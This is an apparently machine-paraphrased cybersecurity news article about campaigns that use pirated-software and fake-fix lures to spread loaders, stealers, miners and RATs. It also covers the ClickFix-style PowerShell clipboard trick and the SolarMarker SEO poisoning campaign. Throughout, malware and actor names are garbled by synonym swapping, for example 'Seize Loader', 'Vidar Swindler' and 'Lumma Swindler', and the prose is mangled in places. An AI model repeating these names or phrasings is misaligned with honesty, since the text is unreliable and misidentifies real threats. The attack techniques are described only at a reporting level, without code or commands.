Hackers Utilize Gratis Software Bait to Launch Seize Loader and Vidar Swindler

Jun 18, 2024NewsroomMalware / Cybercrime

Opponents are enticing unsuspecting users with complimentary or bootleg versions of business software to distribute a malevolent loader named Seize Loader, which then launches a data thief identified as Vidar Swindler.

“Foes had succeeded in deceiving users into acquiring password-protected archive files containing trojanized duplicates of a Cisco Webex Meetings App (ptService.exe),” Trellix security expert Ale Houspanossian expressed in an analysis on Monday.

“When unsuspecting victims unpacked and ran a ‘Setup.exe’ binary file, the Cisco Webex Meetings application stealthily loaded a sneaky malware loader, resulting in the running of a data-stealing module.”

The launchpad is an RAR archive file that houses an executable named “Setup.exe,” but essentially is a facsimile of Cisco Webex Meetings’s ptService module.

What renders the operation standout is the utilization of DLL side-loading techniques to surreptitiously initiate Seize Loader (also known as DOILoader or IDAT Loader), which then acts as a channel to drop Vidar Swindler through the means of an AutoIt script.

“The malware employs a recognized technique to bypass User Account Control (UAC) and exploit the CMSTPLUA COM interface for privilege escalation,” Houspanossian remarked. “Following successful privilege escalation, the malware appended itself to Windows Defender’s exclusion list to evade defense mechanisms.”

The assault chain, apart from using Vidar Swindler to extract sensitive credentials from web browsers, deploys extra payloads to start a cryptocurrency miner on the compromised machine.

The revelation tails a rise in ClearFake campaigns that attract site visitors to manually run PowerShell script to fix an alleged issue with viewing web pages, a tactic formerly unveiled by ReliaQuest at the close of the prior month.

The PowerShell script then functions as a springboard for Seize Loader, which eventually delivers the Lumma Swindler malware. The swindler is additionally arranged to fetch three more payloads, including Amadey Loader, a downloader that triggers the XMRig miner, and a clipper malware to reroute cryptocurrency transactions to wallets controlled by attackers.

“Amadey was spotted downloading other payloads, such as a Go-based malware believed to be JaskaGO,” Proofpoint researchers Tommy Madjar, Dusty Miller, and Selena Larson commented.

The business security firm also identified in mid-April 2024 another set of activities named ClickFix that employed flawed browser update lures to visitors of compromised websites to spread Vidar Swindler using a similar mechanism involving duplicating and running PowerShell code.

Another opponent that has adopted the same social engineering maneuver in its malspam campaigns is TA571, which has been seen dispatching emails with HTML attachments that, upon opening, present an error message: “The ‘Word Online’ extension is not installed in your browser.”

The message also offers two choices, “How to fix” and “Auto-fix.” If a target opts for the first choice, a Base64-encoded PowerShell command is copied to the computer’s clipboard followed by instructions to run a PowerShell terminal and right-click the console window to paste the content and execute the code responsible for executing either an MSI installer of a Visual Basic Script (VBS).

In a similar vein, users who opt for the “Auto-fix” are presented WebDAV-hosted files named “fix.msi” or “fix.vbs” in Windows Explorer by exploiting the “search-ms:” protocol handler.

Irrespective of the route taken, the execution of the MSI file results in the installation of Matanbuchus, while the execution of the VBS file triggers the execution of DarkGate.

Other variantsof the operation have also led to the spread of NetSupport RAT, highlighting efforts to alter and enhance the bait and assault sequences despite the need for substantial user engagement on the part of the individual in order to achieve success.

“The lawful utilization, and the numerous methods to store the malevolent code, and the reality that the victim manually executes the malevolent code without any direct link to a file, renders detection of these types of dangers challenging,” Proofpoint remarked.

“Since antivirus programs and EDRs may encounter problems examining clipboard content, detection and prevention measures must be in place before the harmful HTML/site is shown to the victim.”

The advancement also comes as eSentire revealed a malicious operation that exploits counterfeit websites impersonating Indeed[.]com to deploy the SolarMarker data-stealing malware via a lure document that claims to provide team-building suggestions.

“SolarMarker employs search engine optimization (SEO) manipulation tactics to influence search engine results and amplify the visibility of deceptive links,” the Canadian cybersecurity firm stated.

“The offenders’ utilization of SEO strategies to direct users to harmful sites emphasizes the importance of being wary of clicking on search engine results, even if they seem genuine.”